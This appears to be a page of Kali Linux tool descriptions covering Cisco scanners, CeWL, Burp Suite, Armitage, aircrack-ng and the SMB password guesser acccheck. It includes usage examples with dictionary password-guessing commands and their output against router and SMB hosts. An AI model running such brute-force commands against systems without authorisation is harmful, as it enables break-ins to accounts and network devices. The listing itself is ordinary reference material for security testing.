cisco-auditing-tool – Scans Cisco routers for common vulnerabilities

Tool Description

Perl script which scans cisco routers for common vulnerabilities.

Tool Source: http://www.scrypt.net/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary

General Details

[email protected]:~# CAT

Cisco Auditing Tool - g0ne [null0]
Usage:
    -h hostname (for scanning single hosts)
    -f hostfile (for scanning multiple hosts)
    -p port #   (default port is 23)
    -w wordlist (wordlist for community name guessing)
    -a passlist (wordlist for password guessing)
    -i [ioshist]    (Check for IOS History bug)
    -l logfile  (file to log to, default screen)
    -q quiet mode   (no screen output)

Usage Example

Scan the host (-h 192.168.99.230) on port 23 (-p 23), using a password dictionary file (-a /usr/share/wordlists/nmap.lst):

[email protected]:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst 

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.99.230


Guessing passwords: 

Invalid Password: 123456
Invalid Password: 12345

Video Tutorial: Coming Soon!

cisco-torch – Cisco device scanner

Tool Description

Cisco Torch mass scanning, fingerprinting, and exploitation tool was written while working on the next edition of the “Hacking Exposed Cisco Networks”, since the tools available on the market could not meet our needs.

The main feature that makes Cisco-torch different from similar tools is the extensive use of forking to launch multiple scanning processes on the background for maximum scanning efficiency. Also, it uses several methods of application layer fingerprinting simultaneously, if needed. We wanted something fast to discover remote Cisco hosts running Telnet, SSH, Web, NTP and SNMP services and launch dictionary attacks against the services discovered.

Tool Source: http://www.hackingciscoexposed.com/?link=tools

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-torch.git;a=summary

Video Tutorial: Coming Soon!

CeWL – Custom wordlist generator

Tool Description

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Tool Source: http://www.digininja.org/projects/cewl.php

Kali Repo: http://git.kali.org/gitweb/?p=packages/cewl.git;a=summary

Video Tutorial: Coming Soon!

BurpSuite – Platform for security testing of web applications

Tool Description

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Tool Source: http://portswigger.net/burp/

Kali Repo: http://git.kali.org/gitweb/?p=packages/burpsuite.git;a=summary

Video Tutorial: Coming Soon!

Armitage – Red Team collaboration tool

Tool Description

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

  • Use the same sessions
  • Share hosts, captured data, and downloaded files
  • Communicate through a shared event log.
  • Run bots to automate red team tasks.

Armitage is a force multiplier for red team operations.

Tool Source: http://www.fastandeasyhacking.com/manual#0

Kali Repo: http://git.kali.org/gitweb/?p=packages/armitage.git;a=summary

Included Tools:

  • Armitage
  • Teamserver

Video Tutorial: Coming Soon!

 

AIRCRACK-NG

Tool Description

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimisations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Tool Source: http://aircrack-ng.org/

Kali Repo: http://git.kali.org/gitweb/?p=packages/aircrack-ng.git;a=summary

Included Tools:

  • airbase-ng – Configure fake access points
  • aircrack-ng – Wireless password cracker
  • airdecap-ng – Decrypt WEP/WPA/WPA2 capture files
  • airdecloak-ng – Removes WEP cloaking from a pcap file
  • airdriver-ng – Provides status information about the wireless drivers on your system
  • aireplay-ng –  Primary function is to generate traffic for later use in aircrack-ng
  • airmon-ng – This script can be used to enable monitor mode on wireless interfaces
  • airmon-zc – This script can be used to enable monitor mode on wireless interfaces
  • airodump-ng – Used for packet capturing of raw 802.11 frames
  • airodump-ng-oui-update – Downloads and parses IEEE OUI list
  • airolib-ng – Designed to store and manage essid and password lists
  • airserv-ng – A wireless card server
  • airtun-ng – Virtual tunnel interface creator
  • besside-ng -Automatically crack WEP and WPA networks
  • buddy-ng
  • easside-ng – An auto-magic tool which allows you to communicate via an WEP-encrypted access point
  • ivstools – This tool handle .ivs files. You can either merge or convert them
  • kstats
  • makeivs-ng – Generates initialization vectors
  • packetforge-ng – Create encrypted packets that can subsequently be used for injection
  • tkiptun-ng – This tool is able to inject a few frames into a WPA TKIP network with QoS
  • wesside-ng – Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key
  • wpaclean – Remove excess data from a pcap file

Video Tutorial: Coming Soon!

ACCCHECK – Password dictionary attack tool for SMB

Tool Description

The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and as a result is dependent on it for its execution.

Tool Source: https://labs.portcullis.co.uk/tools/acccheck/

Kali Repo: http://git.kali.org/gitweb/?p=packages/acccheck.git;a=summary

General Details

[email protected]:~# acccheck

acccheck v0.2.1 - By Faiz

Description:
Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been
chosen, and tries a combination of usernames and passwords in the hope to identify
the password to a given account via a dictionary password guessing attack.

Usage = ./acccheck [optional]

 -t [single host IP address]
 OR
 -T [file containing target ip address(es)]

Optional:
 -p [single password]
 -P [file containing passwords]
 -u [single user]
 -U [file containing usernames]
 -v [verbose mode]

Examples
Attempt the 'Administrator' account with a [BLANK] password.
    acccheck -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
    acccheck -t 10.10.10.1 -P password.txt
Attempt all password in 'password.txt' against all users in 'users.txt'.
    acccehck -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
    acccheck -t 10.10.10.1 -u administrator -p password

Usage Example

[email protected]:~# acccheck.pl -T smb-ips.txt -v
Host:192.168.1.201, Username:Administrator, Password:BLANK

Video Tutorial: Coming Soon!